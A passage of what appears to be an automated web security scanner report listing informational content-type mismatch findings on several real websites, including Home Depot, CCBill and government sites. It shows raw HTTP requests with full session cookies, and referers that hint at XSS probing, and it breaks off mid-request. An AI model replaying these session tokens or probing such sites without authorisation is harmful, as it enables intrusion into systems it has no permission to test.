Severity:	Information
Confidence:	Firm
Host:	https://store.popcap.com
Path:	/js/s_code.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wallst.jpmorganchase.com
Path:	/chase/services/MultiQuote/MultiQuote.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27.9. http://www.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ccbill.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:00:57 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 18:07:48 GMT
ETag: "3043993e-37e-eb3c2500"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ................................................[.j@..U....................................O...d...........}............................O...............................
...[SNIP]...

27.10. http://www.ccbill.com/signup/trans.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ccbill.com
Path:	/signup/trans.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /signup/trans.cgi?CA=700080 HTTP/1.1
Host: www.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 12 Jul 2011 17:02:29 GMT
Server: Apache
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

27.11. https://www.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.ccbill.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

27.12. http://www.citizencorps.gov/includes/facts.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.citizencorps.gov
Path:	/includes/facts.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

27.13. http://www.doit.ri.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.doit.ri.gov
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.doit.ri.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=k6fe98tah1chc4hcr5dhu1bsc4

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 29 Jan 2007 15:11:50 GMT
ETag: "155800d-57e-4bf89980"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... ...........@...........................4...}HB.....c....z.CTj.....1r..V.,..rg.....WFJ.jen..`Z.k...........r7-.....D...I...w...Hz..=...Nev.....S...h"(..wu.SS].kZ^.e.....
...[SNIP]...

27.14. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

27.15. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/businessControlledFragments/htmls/TypeAhead-min.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /businessControlledFragments/htmls/TypeAhead-min.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 11 May 2011 02:05:14 GMT
ETag: "15850c-2d65-80d5ea80"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 11621
Cache-Control: max-age=5513
Date: Tue, 12 Jul 2011 16:35:40 GMT
Connection: close

dojo.require("dojo.string");
function TypeAhead(opts)
{
var defaultOpts = {
searchBox: '',
resultsDiv: document.getElementById('typeahead'),
dbObject: 'ta_data',
db
...[SNIP]...

27.16. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PM10658 Apache/2.0.47 (Unix)
Last-Modified: Wed, 15 Sep 2010 19:08:12 GMT
ETag: "1f88ac-1f7-d049f00"
Accept-Ranges: bytes
Content-Length: 503
Content-Type: image/gif
Cache-Control: max-age=5493
Date: Tue, 12 Jul 2011 16:35:41 GMT
Connection: close

......JFIF.....d.d......Ducky.......2.....!Adobe.d...........    .................................
..
.......................#"""#''''''''''.    ..
   .        ...................................!! !!''
...[SNIP]...

27.17. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Jun 2011 05:02:35 GMT
ETag: "26b0bd-2999-2d6030c0"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 10649
Cache-Control: max-age=5544
Date: Tue, 12 Jul 2011 16:35:40 GMT
Connection: close

// HomePage specific js 04/24/2011 Thiresh Desha Fixed brightcove video on iPad
// ******* Brightcove Functions *********
var playerName;
isPlayerAdded = false;

var tabNum = 0;
var timer;
var idleTim
...[SNIP]...

27.18. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 01 Jun 2011 05:07:14 GMT
ETag: "30778a-1788-7e62c480"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 6024
Cache-Control: max-age=5458
Date: Tue, 12 Jul 2011 16:35:40 GMT
Connection: close

$(document).ready(function(){//when dom is read
//set first slide and nav item to active class
$('.hero_slide:first').addClass('active').css({opacity:'1'});

...[SNIP]...

27.19. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; ResonanceSegment=1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Jun 2011 05:02:43 GMT
ETag: "c4c4c4-88f-2dda42c0"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 2191
Cache-Control: max-age=5540
Date: Tue, 12 Jul 2011 16:35:40 GMT
Connection: close

...var lithiumConfig;

function LithiumConfig() {
this.BaseUrl = "";
this.WebBaseUrl = "";
this.SessionKey = "";
this.LastRequestPath = "";
}

function initLithium(baseUrl, we
...[SNIP]...

27.20. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/arrow_cta.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/arrow_cta.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489037105%3a%3bC25%5fEXP%3d1362329037%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%7cnull%7c%2d2000%5d%2c3BGt1536l7E8DMQ2tmDGwVwz0tc%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310490838387%3B%20s_prevPage%3Dmostpopular%7C1310490838390%3B%20p_30%3DCategory%7C1310490838393%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "184248-36-b4b8e140"
Accept-Ranges: bytes
Content-Length: 54
Content-Type: image/png
Cache-Control: max-age=4919
Date: Tue, 12 Jul 2011 16:44:00 GMT
Connection: close

GIF89a.. ......(...!.......,...... ..........bq.%_(.;

27.21. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/clear.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/clear.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "17b84c-44-b4b8e140"
Accept-Ranges: bytes
Content-Length: 68
Content-Type: image/png
Cache-Control: max-age=5507
Date: Tue, 12 Jul 2011 16:35:45 GMT
Connection: close

GIF89a.............!.......,.............................H......b..;

27.22. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/orange-square.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/orange-square.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
